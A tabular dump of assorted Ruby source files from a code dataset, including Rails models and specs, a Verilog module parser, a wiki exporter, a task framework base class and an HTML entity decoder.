hexsha (stringlengths 40–40) | size (int64 2–1.01M) | content (stringlengths 2–1.01M) | avg_line_length (float64 1.5–100) | max_line_length (int64 2–1k) | alphanum_fraction (float64 0.25–1) |
---|---|---|---|---|---|
ed10c220bc4363c4d6943abd3f7ffc3ae1663e7f
| 92 |
class RecipeCategory < ActiveRecord::Base
belongs_to :category
belongs_to :recipe
end
| 13.142857 | 41 | 0.782609 |
1c276aa7655e4d4584680dd99fbbb33c3be15cc9
| 4,814 |
require "cases/helper"
module ActiveRecord
module ConnectionAdapters
class QuotingTest < ActiveRecord::TestCase
def setup
@quoter = Class.new { include Quoting }.new
end
def test_quoted_true
assert_equal "'t'", @quoter.quoted_true
end
def test_quoted_false
assert_equal "'f'", @quoter.quoted_false
end
def test_quote_column_name
assert_equal "foo", @quoter.quote_column_name("foo")
end
def test_quote_table_name
assert_equal "foo", @quoter.quote_table_name("foo")
end
def test_quote_table_name_calls_quote_column_name
@quoter.extend(Module.new {
def quote_column_name(string)
"lol"
end
})
assert_equal "lol", @quoter.quote_table_name("foo")
end
def test_quote_string
assert_equal "''", @quoter.quote_string("'")
assert_equal "\\\\", @quoter.quote_string("\\")
assert_equal "hi''i", @quoter.quote_string("hi'i")
assert_equal "hi\\\\i", @quoter.quote_string("hi\\i")
end
def test_quoted_date
t = Date.today
assert_equal t.to_s(:db), @quoter.quoted_date(t)
end
def test_quoted_time_utc
with_timezone_config default: :utc do
t = Time.now.change(usec: 0)
assert_equal t.getutc.to_s(:db), @quoter.quoted_date(t)
end
end
def test_quoted_time_local
with_timezone_config default: :local do
t = Time.now.change(usec: 0)
assert_equal t.getlocal.to_s(:db), @quoter.quoted_date(t)
end
end
def test_quoted_time_crazy
with_timezone_config default: :asdfasdf do
t = Time.now.change(usec: 0)
assert_equal t.getlocal.to_s(:db), @quoter.quoted_date(t)
end
end
def test_quoted_datetime_utc
with_timezone_config default: :utc do
t = Time.now.change(usec: 0).to_datetime
assert_equal t.getutc.to_s(:db), @quoter.quoted_date(t)
end
end
###
# DateTime doesn't define getlocal, so make sure it does nothing
def test_quoted_datetime_local
with_timezone_config default: :local do
t = Time.now.change(usec: 0).to_datetime
assert_equal t.to_s(:db), @quoter.quoted_date(t)
end
end
def test_quote_with_quoted_id
assert_equal 1, @quoter.quote(Struct.new(:quoted_id).new(1), nil)
end
def test_quote_nil
assert_equal "NULL", @quoter.quote(nil, nil)
end
def test_quote_true
assert_equal @quoter.quoted_true, @quoter.quote(true, nil)
end
def test_quote_false
assert_equal @quoter.quoted_false, @quoter.quote(false, nil)
end
def test_quote_float
float = 1.2
assert_equal float.to_s, @quoter.quote(float, nil)
end
def test_quote_integer
integer = 1
assert_equal integer.to_s, @quoter.quote(integer, nil)
end
def test_quote_bignum
bignum = 1 << 100
assert_equal bignum.to_s, @quoter.quote(bignum, nil)
end
def test_quote_bigdecimal
bigdec = BigDecimal.new((1 << 100).to_s)
assert_equal bigdec.to_s("F"), @quoter.quote(bigdec, nil)
end
def test_dates_and_times
@quoter.extend(Module.new { def quoted_date(value) "lol" end })
assert_equal "'lol'", @quoter.quote(Date.today, nil)
assert_equal "'lol'", @quoter.quote(Time.now, nil)
assert_equal "'lol'", @quoter.quote(DateTime.now, nil)
end
def test_crazy_object
crazy = Object.new
e = assert_raises(TypeError) do
@quoter.quote(crazy, nil)
end
assert_equal "can't quote Object", e.message
end
def test_quote_string_no_column
assert_equal "'lo\\\\l'", @quoter.quote('lo\l', nil)
end
def test_quote_as_mb_chars_no_column
string = ActiveSupport::Multibyte::Chars.new('lo\l')
assert_equal "'lo\\\\l'", @quoter.quote(string, nil)
end
def test_string_with_crazy_column
assert_equal "'lo\\\\l'", @quoter.quote('lo\l')
end
def test_quote_duration
assert_equal "1800", @quoter.quote(30.minutes)
end
end
class QuoteBooleanTest < ActiveRecord::TestCase
def setup
@connection = ActiveRecord::Base.connection
end
def test_quote_returns_frozen_string
assert_predicate @connection.quote(true), :frozen?
assert_predicate @connection.quote(false), :frozen?
end
def test_type_cast_returns_frozen_value
assert_predicate @connection.type_cast(true), :frozen?
assert_predicate @connection.type_cast(false), :frozen?
end
end
end
end
| 28.317647 | 73 | 0.624429 |
f71eeddf11880b5debc42f887f8e6f4300f60fb1
| 1,498 |
# frozen_string_literal: true
require 'rails_helper'
RSpec.describe Cocina::ToFedora::Descriptive::Subject do
subject(:xml) { writer.to_xml }
let(:writer) do
Nokogiri::XML::Builder.new do |xml|
xml.mods('xmlns' => 'http://www.loc.gov/mods/v3',
'xmlns:xsi' => 'http://www.w3.org/2001/XMLSchema-instance',
'version' => '3.6',
'xsi:schemaLocation' => 'http://www.loc.gov/mods/v3 http://www.loc.gov/standards/mods/v3/mods-3-6.xsd') do
described_class.write(xml: xml, subjects: subjects, id_generator: Cocina::ToFedora::Descriptive::IdGenerator.new)
end
end
end
context 'when it has a hierarchical geographic subject missing some hierarchies' do
let(:subjects) do
[
Cocina::Models::DescriptiveValue.new(
structuredValue: [
{
value: 'Africa',
type: 'continent'
}
],
type: 'place'
)
]
end
it 'builds the xml' do
expect(xml).to be_equivalent_to <<~XML
<mods xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://www.loc.gov/mods/v3" version="3.6"
xsi:schemaLocation="http://www.loc.gov/mods/v3 http://www.loc.gov/standards/mods/v3/mods-3-6.xsd">
<subject>
<hierarchicalGeographic>
<continent>Africa</continent>
</hierarchicalGeographic>
</subject>
</mods>
XML
end
end
end
| 30.571429 | 121 | 0.579439 |
61f42c78a1de80306ce8f15c6552b5311b3fc298
| 2,139 |
#!/bin/ruby
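# Scans the given Verilog source files for module declarations and prints a JSON
# summary of the form {"cells": [{"cell": <module name>, "inps": [...], "outs": [...]}, ...]}.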
require 'strscan'
if ARGV.size < 1
puts "USAGE: verilog.rb <filenames>"
exit 1
end
scanner = StringScanner.new("")
inmod = false
modname = nil
inputs = []
outputs = []
linen = 0
counter = 0;
print "\{\n"
puts "\"cells\": \[\n"
tmp = ARGV
while file = ARGV.shift
File.open(file).each_line do |line|
scanner << line
linen += 1
scanner.skip(/\s*/)
scanner.skip(/\/\*[\n\s\w\W\*]*\*\//)
scanner.skip(/\/\/[\w\W]*\n/)
scanner.skip(/`[\w\W]*\n/)
if(!inmod)
if(scanner.skip(/module\s*/))
#puts "found module"
inmod = true
end
end
if(inmod)
scanner.skip(/[\s\n]*/)
if(modname == nil)
if(scanner.skip(/\\?(\$?\w+)/))
modname = scanner[1]
else
next
end
end
if(scanner.skip(/\s*\(/))
while(scanner.skip(/\s*(\w+)\s*,\s*/))
end
scanner.skip(/\w+\s*\)\s*;[\s\n]*/)
end
if(scanner.skip(/\s*input\s+/))
scanner.skip(/\[\d+:\d+\]/)
while(scanner.skip(/\s*(\w+)\s*[,;]?\s*/))
inputs << scanner[1]
break if(scanner.rest.match(/\s*output\s*/))
end
scanner.skip(/\s*;\s*/)
end
if(scanner.skip(/\s*output\s+/))
scanner.skip(/reg\s+/)
scanner.skip(/\[\d+:\d+\]/)
while(scanner.skip(/\s*(\w+)\s*[,;]?\s*/))
outputs << scanner[1]
break if(scanner.rest.match(/\s*input\s*/))
end
scanner.skip(/\s*;\s*/)
end
#ignore everything else
if(scanner.skip_until(/endmodule/))
if(counter > 0)
print(",\n")
end
#puts "- cell: #{modname}"
puts "\{ "
puts "\"cell\": \"#{modname}\","
print "\"inps\": \["
print inputs.map { |a| "\"#{a}\""}.join(",\t")
puts "\],"
print "\"outs\": \["
print outputs.map { |a| "\"#{a}\""}.join(",\t")
puts "\]"
print "\}"
inmod = false
modname = nil
inputs.clear
outputs.clear
counter += 1
end
end
end
end
print "\n\]\n"
print "\}"
| 19.445455 | 56 | 0.451145 |
f704bfd2cc55b6efbcc603f3a01b8371a9a87811
| 7,104 |
require 'spec_helper'
require 'ostruct'
describe 'Locomotive rendering system' do
before(:each) do
@controller = Locomotive::TestController.new
Site.any_instance.stubs(:create_default_pages!).returns(true)
@site = Factory.build(:site)
Site.stubs(:find).returns(@site)
@controller.current_site = @site
@page = Factory.build(:page, :site => nil, :published => true)
end
context '#liquid_context' do
it 'includes the current date and time' do
@controller.instance_variable_set(:@page, @page)
@controller.stubs(:flash).returns({})
@controller.stubs(:params).returns({})
@controller.stubs(:request).returns(OpenStruct.new(:url => '/'))
context = @controller.send(:locomotive_context)
context['now'].should_not be_blank
context['today'].should_not be_blank
end
end
context 'setting the response' do
before(:each) do
@controller.instance_variable_set(:@page, @page)
@controller.send(:prepare_and_set_response, 'Hello world !')
end
it 'sets the content type to html' do
@controller.response.headers['Content-Type'].should == 'text/html; charset=utf-8'
end
it 'sets the status to 200 OK' do
@controller.status.should == :ok
end
it 'displays the output' do
@controller.output.should == 'Hello world !'
end
it 'does not set the cache' do
@controller.response.headers['Cache-Control'].should be_nil
end
it 'sets the cache by simply using etag' do
@page.cache_strategy = 'simple'
@page.stubs(:updated_at).returns(Time.now)
@controller.send(:prepare_and_set_response, 'Hello world !')
@controller.response.to_a # force to build headers
@controller.response.headers['Cache-Control'].should == 'public'
end
it 'sets the cache for Varnish' do
@page.cache_strategy = '3600'
@page.stubs(:updated_at).returns(Time.now)
@controller.send(:prepare_and_set_response, 'Hello world !')
@controller.response.to_a # force to build headers
@controller.response.headers['Cache-Control'].should == 'max-age=3600, public'
end
it 'sets the status to 404 not found when no page is found' do
@page.stubs(:not_found?).returns(true)
@controller.send(:prepare_and_set_response, 'Hello world !')
@controller.status.should == :not_found
end
end
context 'when retrieving page' do
it 'should retrieve the index page /' do
@controller.request.fullpath = '/'
@controller.current_site.pages.expects(:any_in).with({ :fullpath => %w{index} }).returns([@page])
@controller.send(:locomotive_page).should_not be_nil
end
it 'should also retrieve the index page (index.html)' do
@controller.request.fullpath = '/index.html'
@controller.current_site.pages.expects(:any_in).with({ :fullpath => %w{index} }).returns([@page])
@controller.send(:locomotive_page).should_not be_nil
end
it 'should retrieve it based on the full path' do
@controller.request.fullpath = '/about_us/team.html'
@controller.current_site.pages.expects(:any_in).with({ :fullpath => %w{about_us/team about_us/content_type_template} }).returns([@page])
@controller.send(:locomotive_page).should_not be_nil
end
it 'does not include the query string' do
@controller.request.fullpath = '/about_us/team.html?some=params&we=use'
@controller.current_site.pages.expects(:any_in).with({ :fullpath => %w{about_us/team about_us/content_type_template} }).returns([@page])
@controller.send(:locomotive_page).should_not be_nil
end
it 'should return the 404 page if the page does not exist' do
@controller.request.fullpath = '/contact'
(klass = Page).expects(:published).returns([true])
@controller.current_site.pages.expects(:not_found).returns(klass)
@controller.send(:locomotive_page).should be_true
end
context 'redirect' do
before(:each) do
@page.redirect = true
@page.redirect_url = 'http://www.example.com/'
@controller.request.fullpath = '/contact'
@controller.current_site.pages.expects(:any_in).with({ :fullpath => %w{contact content_type_template} }).returns([@page])
end
it 'redirects to the redirect_url' do
@controller.expects(:redirect_to).with('http://www.example.com/').returns(true)
@controller.send(:render_locomotive_page)
end
end
context 'templatized page' do
before(:each) do
@content_type = Factory.build(:content_type, :site => nil)
@content = @content_type.contents.build(:_visible => true)
@page.templatized = true
@page.content_type = @content_type
@controller.request.fullpath = '/projects/edeneo.html'
@controller.current_site.pages.expects(:any_in).with({ :fullpath => %w{projects/edeneo projects/content_type_template} }).returns([@page])
end
it 'sets the content_instance variable' do
@content_type.contents.stubs(:where).returns([@content])
@controller.send(:locomotive_page).should_not be_nil
@controller.instance_variable_get(:@content_instance).should == @content
end
it 'returns the 404 page if the instance does not exist' do
@content_type.contents.stubs(:where).returns([])
(klass = Page).expects(:published).returns([true])
@controller.current_site.pages.expects(:not_found).returns(klass)
@controller.send(:locomotive_page).should be_true
@controller.instance_variable_get(:@content_instance).should be_nil
end
it 'returns the 404 page if the instance is not visible' do
@content._visible = false
@content_type.contents.stubs(:where).returns([@content])
(klass = Page).expects(:published).returns([true])
@controller.current_site.pages.expects(:not_found).returns(klass)
@controller.send(:locomotive_page).should be_true
end
end
context 'non published page' do
before(:each) do
@page.published = false
@controller.current_admin = nil
end
it 'should return the 404 page if the page has not been published yet' do
@controller.request.fullpath = '/contact'
@controller.current_site.pages.expects(:any_in).with({ :fullpath => %w{contact content_type_template} }).returns([@page])
(klass = Page).expects(:published).returns([true])
@controller.current_site.pages.expects(:not_found).returns(klass)
@controller.send(:locomotive_page).should be_true
end
it 'should not return the 404 page if the page has not been published yet and admin is logged in' do
@controller.current_admin = true
@controller.request.fullpath = '/contact'
@controller.current_site.pages.expects(:any_in).with({ :fullpath => %w{contact content_type_template} }).returns([@page])
@controller.send(:locomotive_page).should == @page
end
end
end
after(:all) do
ENV['APP_TLD'] = nil
Locomotive.configure_for_test(true)
end
end
| 37 | 146 | 0.675535 |
bb423ec1e9e8cf6803f37b6f72a3664411b5d771
| 1,854 |
require 'daimyo'
module Daimyo
class Export
def initialize
@wiki ||= Daimyo::Client.new
end
def run(project_id, wiki_id = nil)
ids = select_wiki_ids(project_id)
pb = ProgressBar.create(:format => "%a %b\u{15E7}%i %p%% %t",
:progress_mark => ' ',
:remainder_mark => "\u{FF65}",
:starting_at => 10,
:length => 50)
ids.each do |id|
wiki = @wiki.export(id).body
name = wiki.name
content = wiki.content
write_file(project_id, id, name, content)
pb.increment
sleep 0.1
end
pb.finish
end
private
def select_wiki_ids(project_id)
@wiki.list(project_id).body.map { |w| w.id }
end
def write_file(project_id, id, name, content)
path = define_directory_path(project_id, name)
create_wiki_directory(path)
filename = id.to_s + '_' + define_file_path(name) + '.md'
file_path = path + '/' + filename
File.open(file_path, 'w') do |f|
f.puts(content.gsub("\r\n", "\n"))
end
original_file_path = path + '/' + '.' + filename
File.open(original_file_path, 'w') do |f|
f.puts(content.gsub("\r\n", "\n"))
end
end
def create_wiki_directory(path)
FileUtils.mkdir_p(path) unless FileTest.exist?(path)
path
end
def define_directory_path(project_id, name)
space = @wiki.instance_variable_get(:@client).instance_variable_get(:@space_id)
return space + '/' + project_id unless name.include?('/')
space + '/' + project_id + '/' + File.dirname(name) # the last path element is treated as the file name
end
def define_file_path(name)
return name unless name.include?('/')
File.basename(name) # the last path element is treated as the file name
end
end
end
| 28.090909 | 85 | 0.565804 |
9197f2b1cc61b256e0c34b99d295d90d807eea8e
| 835 |
if RUBY_PLATFORM =~ /java/
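  # Add fingerprint, serial-number and validity-date helpers to Java
  # X509Certificate instances when running under JRuby.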
class java::security::cert::X509Certificate
java_import 'org.apache.commons.codec.binary.Hex'
java_import 'java.security.MessageDigest'
def md5_fingerprint
digest("md5")
end
def sha1_fingerprint
digest("sha1")
end
def serial_number_string
self.serial_number.to_i.to_s(16).upcase
end
def issued_on
to_utc(self.not_before)
end
def expires_on
to_utc(self.not_after)
end
private
def digest(algorithm)
hex_bytes = Hex.encodeHex(MessageDigest.getInstance(algorithm).digest(self.encoded))
colon_separated(java.lang.String.new(hex_bytes).to_s)
end
def colon_separated(string)
string.upcase.scan(/.{2}/).join(':')
end
def to_utc(date)
Time.parse(date.to_s).utc
end
end
end
| 19.418605 | 90 | 0.667066 |
6aa95958a8e76e1a03b0e76ea2e9cb73afbf35e0
| 9,020 |
module Intrigue
module Task
class BaseTask
# TODO - verify and re-enable these.. just need to make sure
# there are no namespace collisions
include Intrigue::Task::Browser
include Intrigue::Task::Data
include Intrigue::Task::Dns
include Intrigue::Task::Enrich
include Intrigue::Task::Generic
include Intrigue::Task::Helper
include Intrigue::Task::Parse
include Intrigue::Task::Product
include Intrigue::Task::Regex
include Intrigue::Task::Scanner
include Intrigue::Task::Web
include Sidekiq::Worker
sidekiq_options :queue => "task", :backtrace => true
def self.inherited(base)
TaskFactory.register(base)
end
def perform(task_result_id)
# Get the Task Result
@task_result = Intrigue::Model::TaskResult.first(:id => task_result_id)
raise "Unable to find task result: #{task_result_id}. Bailing." unless @task_result
# Handle cancellation
if @task_result.cancelled
_log_error "FATAL!!! I was cancelled, returning without running!"
return
end
begin
@entity = @task_result.base_entity
@project = @task_result.project
options = @task_result.options
# we must have these things to continue (if they're missing, fail)
unless @task_result && @project && @entity
_log_error "Unable to find task_result. Bailing." unless @task_result
_log_error "Unable to find project. Bailing." unless @project
_log_error "Unable to find entity. Bailing." unless @entity
return nil
end
# We need a flag to skip the actual setup, run, cleanup of the task if
# the caller gave us something broken. We still want to get the final
# task result back to the caller though (so no raise). Assume it's good,
# and check input along the way.
broken_input_flag = false
# Do a little logging. Do it for the kids!
_log "Id: #{task_result_id}"
_log "Entity: #{@entity.type_string}##{@entity.name}"
###################
# Sanity Checking #
###################
allowed_types = self.class.metadata[:allowed_types]
# Check to make sure this task can receive an entity of this type and if
unless allowed_types.include?(@entity.type_string) || allowed_types.include?("*")
_log_error "Unable to call #{self.class.metadata[:name]} on entity: #{@entity}"
broken_input_flag = true
end
###########################
# Setup the task result #
###########################
@task_result.task_name = self.class.metadata[:name]
@task_result.timestamp_start = Time.now.getutc
#####################################
# Perform the setup -> run workflow #
#####################################
unless broken_input_flag
# Setup creates the following objects:
# @user_options - a hash of task options
# @task_result - the final result to be passed back to the caller
_log "Setting up the task!"
if setup(task_result_id, @entity, options)
_log "Running the task!"
@task_result.save # Save the task
run # Run the task, which will update @task_result
_log "Run complete. Ship it!"
else
_log_error "Setup failed, bailing out!"
end
end
scan_result = @task_result.scan_result
if scan_result
scan_result.decrement_task_count
puts "#{scan_result.incomplete_task_count} tasks left in this scan"
#################
# Call Handlers #
#################
if scan_result.handlers.count > 0
# Check our incomplete task count on the scan to see if this is the last one
if scan_result.incomplete_task_count <= 0
_log "Last task standing, let's handle it!"
scan_result.handle_attached
# let's mark it complete if there's nothing else to do here.
scan_result.handlers_complete = true
scan_result.complete = true
scan_result.save
end
end
end
#### Task Result Handlers
if @task_result.handlers.count > 0
@task_result.handle_attached
@task_result.handlers_complete = true
end
ensure # Mark it complete and save it
_log "Cleaning up!"
@task_result.timestamp_end = Time.now.getutc
@task_result.complete = true
@task_result.logger.save
@task_result.save
end
end
#########################################################
# These methods are used to perform work in several steps.
# they should be overridden by individual tasks, but note that
# individual tasks must always call super()
#
def setup(task_id, entity, user_options)
# We need to parse options and make sure we're
# allowed to accept these options. Compare to allowed_options.
#
# allowed options is formatted:
# [{:name => "count", :type => "Integer", :default => 1 }, ... ]
#
# user_options is formatted:
# [{"name" => "option name", "value" => "value"}, ...]
allowed_options = self.class.metadata[:allowed_options]
@user_options = []
if user_options
#_log "Got user options list: #{user_options}"
# for each of the user-supplied options
user_options.each do |user_option| # should be an array of hashes
# go through the allowed options
allowed_options.each do |allowed_option|
# If we have a match of an allowed option & one of the user-specified options
if "#{user_option["name"]}" == "#{allowed_option[:name]}"
### Match the user option against its specified regex
if allowed_option[:regex] == "integer"
#_log "Regex should match an integer"
regex = _get_regex(:integer)
elsif allowed_option[:regex] == "boolean"
#_log "Regex should match a boolean"
regex = _get_regex(:boolean)
elsif allowed_option[:regex] == "alpha_numeric"
#_log "Regex should match an alpha-numeric string"
regex = _get_regex(:alpha_numeric)
elsif allowed_option[:regex] == "alpha_numeric_list"
#_log "Regex should match an alpha-numeric list"
regex = _get_regex(:alpha_numeric_list)
elsif allowed_option[:regex] == "numeric_list"
#_log "Regex should match an alpha-numeric list"
regex = _get_regex(:numeric_list)
elsif allowed_option[:regex] == "filename"
#_log "Regex should match a filename"
regex = _get_regex(:filename)
elsif allowed_option[:regex] == "ip_address"
#_log "Regex should match an IP Address"
regex = _get_regex(:ip_address)
else
_log_error "Unspecified regex for this option #{allowed_option[:name]}"
_log_error "Unable to continue, failing!"
return nil
end
# Run the regex
unless regex.match "#{user_option["value"]}"
_log_error "Regex didn't match"
_log_error "Option #{user_option["name"]} does not match regex: #{regex.to_s} (#{user_option["value"]})!"
_log_error "Regex didn't match, failing!"
return nil
end
###
### End Regex matching
###
# We have an allowed option, with the right kind of value
# ...Now set the correct type
# So things like core-cli are parsing data as strings,
# and are sending us all of our options as strings. Which sucks. We
# have to do the explicit conversion to the right type if we want things to go
# smoothly. I'm sure there's a better way to do this in ruby, but
# I'm equally sure I don't know what it is. We'll fail the task if
# there's something we can't handle
if allowed_option[:regex] == "integer"
# convert to integer
#_log "Converting #{user_option["name"]} to an integer"
user_option["value"] = user_option["value"].to_i
elsif allowed_option[:regex] == "boolean"
# use our monkeypatched .to_bool method (see initializers)
#_log "Converting #{user_option["name"]} to a bool"
user_option["value"] = user_option["value"].to_bool if user_option["value"].kind_of? String
end
# Hurray, we can accept this value
@user_options << { allowed_option[:name] => user_option["value"] }
end
end
end
_log "Options: #{@user_options}"
else
_log "No User options"
end
true
end
# This method is overridden
def run
end
#
#########################################################
# Override this method if the task has external dependencies
def check_external_dependencies
true
end
end
end
end
| 34.826255 | 119 | 0.59612 |
79b8af1a397d632df9af1f2b5610183285ee0b15
| 183 |
require_relative "lib/chronal_calibration"
cc = ChronalCalibration.new
cc.load_file "input/01_input.txt"
puts "Part 1 - #{cc.calculate_frequency}"
puts "Part 2 - #{cc.reach_twice}"
| 22.875 | 42 | 0.765027 |
b9903bbe8e99927291c89037a6deee67dda57e52
| 1,153 |
class Lftp < Formula
desc "Sophisticated file transfer program"
homepage "https://lftp.yar.ru/"
url "https://lftp.yar.ru/ftp/lftp-4.8.4.tar.xz"
sha256 "4ebc271e9e5cea84a683375a0f7e91086e5dac90c5d51bb3f169f75386107a62"
bottle do
# sha256 "7758a9fae5106d3e7f43ae84f34ae0801b73430907afbc3526a6b49a4bccef88" => :mojave
sha256 "648f4e7d3b8f26659cc684b545d4d14ed0e070be7174ff072b69502917f30613" => :high_sierra
sha256 "3850131c9cc3047d8f041744c4245f6f3684093f3de2815fa8bc56ea1896c888" => :sierra
sha256 "080ba35e879de061f9c794bb3ee59f32259897395dd6b774471aed16a91279f8" => :el_capitan
end
depends_on "libidn"
depends_on "openssl"
depends_on "readline"
def install
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}",
"--with-openssl=#{Formula["openssl"].opt_prefix}",
"--with-readline=#{Formula["readline"].opt_prefix}",
"--with-libidn=#{Formula["libidn"].opt_prefix}"
system "make", "install"
end
test do
system "#{bin}/lftp", "-c", "open https://ftp.gnu.org/; ls"
end
end
| 37.193548 | 93 | 0.679965 |
e9e08b2debe43a0d0509b4f52ef1ef898d17214e
| 961 |
class HTMLEntities
class Decoder #:nodoc:
def initialize(flavor)
@flavor = flavor
@map = HTMLEntities::MAPPINGS[@flavor]
@entity_regexp = entity_regexp
end
def decode(source)
prepare(source).gsub(@entity_regexp){
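        # $1: named entity, $2: decimal code point, $3: hexadecimal code point (see #entity_regexp)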
if $1 && codepoint = @map[$1]
codepoint.chr(Encoding::UTF_8)
elsif $2
$2.to_i(10).chr(Encoding::UTF_8)
elsif $3
$3.to_i(16).chr(Encoding::UTF_8)
else
$&
end
}
end
private
def prepare(string) #:nodoc:
string.to_s.encode(Encoding::UTF_8)
end
def entity_regexp
key_lengths = @map.keys.map{ |k| k.length }
if @flavor == 'expanded'
entity_name_pattern = '(?:b\.)?[a-z][a-z0-9]'
else
entity_name_pattern = '[a-z][a-z0-9]'
end
/&(?:(#{entity_name_pattern}{#{key_lengths.min - 1},#{key_lengths.max - 1}})|#([0-9]{1,7})|#x([0-9a-f]{1,6}));/i
end
end
end
| 24.641026 | 118 | 0.547347 |
e9237b8c3fb2b2535083cbb7a3b72cbf131b0006
| 543 |
require 'rails_helper'
RSpec.describe 'PowerConverter' do
context 'slug' do
[
{ to_convert: 'Hello World', expected: 'hello-world' },
{ to_convert: 'HelloWorld', expected: 'hello-world' },
{ to_convert: '', expected: '' },
{ to_convert: nil, expected: '' }
].each do |scenario|
it "will convert #{scenario.fetch(:to_convert)} to #{scenario.fetch(:expected)}" do
expect(PowerConverter.convert(scenario.fetch(:to_convert), to: :slug)).to eq(scenario.fetch(:expected))
end
end
end
end
| 31.941176 | 111 | 0.633517 |
f8a35defcdb3743ee9d7c7e1873e4ba67aafec2d
| 1,021 |
require 'net/http'
require 'uri'
require 'json'
class API
  def self.categories
    uri = URI.parse("https://opentdb.com/api_category.php")
    resp = Net::HTTP.get(uri)
    # symbolize_names is needed because the keys are read as symbols below
    data = JSON.parse(resp, symbolize_names: true)
    categories = data[:trivia_categories]
    # map (rather than each) so the method returns the Category objects it builds
    categories.map do |category|
      id = category[:id]
      name = category[:name]
      Category.new(id, name)
    end
  end
  # The category to fetch a question for must be passed in explicitly
  def self.question(category)
    uri = URI.parse("https://opentdb.com/api.php?amount=1&category=#{category.id}&type=boolean")
    resp = Net::HTTP.get(uri)
    data = JSON.parse(resp, symbolize_names: true)
    result = data[:results][0]
    Question.new(result[:category], result[:type], result[:difficulty],
                 result[:question], result[:correct_answer], result[:incorrect_answers])
  end
end
| 37.814815 | 101 | 0.599412 |
d5c081b0efff7bdd87f5f666c4b3d983dd8b24c3
| 150 |
class SendEmailInProductionJob
include SuckerPunch::Job
def perform(mail)
WeightTracker::MailHelpers.send_mail_with_sendgrid(mail)
end
end
| 18.75 | 60 | 0.806667 |
bb9c5c824f572df189b4a2f0bed5622354d7bf46
| 996 |
namespace :db do
desc "Migrate schema to version 0 and back up again. WARNING: Destroys all data in Radiant tables."
task :remigrate => :environment do
require 'highline/import'
if ENV['OVERWRITE'].to_s.downcase == 'true' or
agree("This task will destroy any data in the database. Are you sure you want to \ncontinue? [yn] ")
# Migrate downward
ActiveRecord::Migrator.migrate("#{RADIANT_ROOT}/db/migrate/", 0)
# Migrate upward
Rake::Task["db:migrate"].invoke
# Dump the schema
Rake::Task["db:schema:dump"].invoke
else
say "Task cancelled."
exit
end
end
desc "Bootstrap your database for Radiant."
task :bootstrap => :remigrate do
require 'radiant/setup'
Radiant::Setup.bootstrap(
:admin_name => ENV['ADMIN_NAME'],
:admin_username => ENV['ADMIN_USERNAME'],
:admin_password => ENV['ADMIN_PASSWORD'],
:database_template => ENV['DATABASE_TEMPLATE']
)
end
end
| 30.181818 | 106 | 0.64257 |
e24ae09c9e56d9597efc7be40e08d77c3bb05cf3
| 1,077 |
module Brightbox
command [:config] do |cmd|
cmd.default_command :client_list
cmd.desc I18n.t("config.client_list.desc")
cmd.command [:client_list] do |c|
c.action do |global_options, _options, _args|
info "Using config file #{Brightbox.config.config_filename}"
clients = Brightbox.config.section_names.map do |cid|
c = Brightbox.config[cid]
calias = c["alias"] || cid
# Append a star for the configured default client
if Brightbox.config.default_client == cid && Brightbox.config.has_multiple_clients?
calias = "*#{calias}"
end
{
:alias => calias,
:client_id => c["client_id"] || Brightbox::EMBEDDED_APP_ID,
:secret => c["secret"] || Brightbox::EMBEDDED_APP_SECRET,
:api_url => c["api_url"],
:auth_url => c["auth_url"] || c["api_url"]
}
end
render_table clients, global_options.merge(:fields => [:alias, :client_id, :secret, :api_url, :auth_url])
end
end
end
end
| 29.916667 | 113 | 0.588672 |
4a4665069a7173265fd2028023a69092e14516a3
| 707 |
# frozen_string_literal: true
# GET {{ base_url }}/address/format/v1/{global_address_key}
module ExperianAddressValidation
module Operations
# Handles address formatting
class Format < Operation
FORMAT_HEADERS = {
"Add-Metadata": "true",
"Add-Components": "true"
}.freeze
private
def endpoint
"#{base_url}/address/format/v1/#{global_address_key}"
end
def global_address_key
options[:global_address_key]
end
def http_method
:get
end
def headers
option_headers = options.fetch(:headers, {})
DEFAULT_HEADERS.merge(**FORMAT_HEADERS, **option_headers)
end
end
end
end
| 20.794118 | 65 | 0.630835 |
01d78249263e1f58d5d9d55ab816a37b186c1428
| 669 |
require "rails_helper"
RSpec.describe Staff::ReportsController do
describe "#index" do
context "when logged in as a delivery partner" do
let(:organisation) { create(:delivery_partner_organisation) }
let(:user) { create(:delivery_partner_user, organisation: organisation) }
before do
allow(controller).to receive(:current_user).and_return(user)
allow(controller).to receive(:logged_in_using_omniauth?).and_return(true)
end
it "redirects to show the user's organisation's reports" do
expect(get(:index)).to redirect_to(organisation_reports_path(organisation_id: organisation.id))
end
end
end
end
| 33.45 | 103 | 0.718984 |
61c9e3d412b95d4337e69d6db8bbba1f718bc12e
| 10,824 |
describe Comable::OrdersController do
render_views
let(:product) { create(:product, stocks: [stock]) }
let(:stock) { create(:stock, :stocked) }
let(:address_attributes) { attributes_for(:address) }
let(:current_order) { controller.current_order }
describe "GET 'signin'" do
before { get :signin }
context 'when empty cart' do
its(:response) { is_expected.to redirect_to(:cart) }
it 'has flash messages' do
expect(flash[:alert]).to eq Comable.t('carts.empty')
end
end
end
# TODO: Refactoring
# - subject { response }
# - remove 'its'
# - 'with state' => context
shared_examples 'checkout' do
let!(:payment_method) { create(:payment_method) }
let!(:shipment_method) { create(:shipment_method) }
let(:product) { create(:product, stocks: [stock]) }
let(:stock) { create(:stock, :stocked) }
let(:address_attributes) { attributes_for(:address) }
let(:current_order) { controller.current_order }
before { allow(controller).to receive(:current_comable_user).and_return(user) }
before { user.add_cart_item(product) }
describe "GET 'signin'" do
before { skip 'Unnecessary test case' if user.signed_in? }
before { get :signin }
its(:response) { is_expected.to render_template(:signin) }
its(:response) { is_expected.not_to be_redirect }
it 'cart has any items' do
expect(user.cart.count).to be_nonzero
end
end
describe "PUT 'guest'" do
let(:order_attributes) { { email: '[email protected]' } }
before { skip 'Unnecessary test case' if user.signed_in? }
before { put :guest, order: order_attributes }
its(:response) { is_expected.to redirect_to(controller.comable.next_order_path(state: :orderer)) }
context 'when email is empty' do
let(:order_attributes) { { email: nil } }
its(:response) { is_expected.to render_template(:signin) }
its(:response) { is_expected.not_to be_redirect }
end
end
describe "GET 'edit' with state 'orderer'" do
let(:order_attributes) { attributes_for(:order, :for_orderer) }
before { current_order.update_attributes(order_attributes) }
before { get :edit, state: :orderer }
its(:response) { is_expected.to render_template(:orderer) }
its(:response) { is_expected.not_to be_redirect }
context 'when not exist email' do
let(:order_attributes) { attributes_for(:order, :for_orderer, email: nil) }
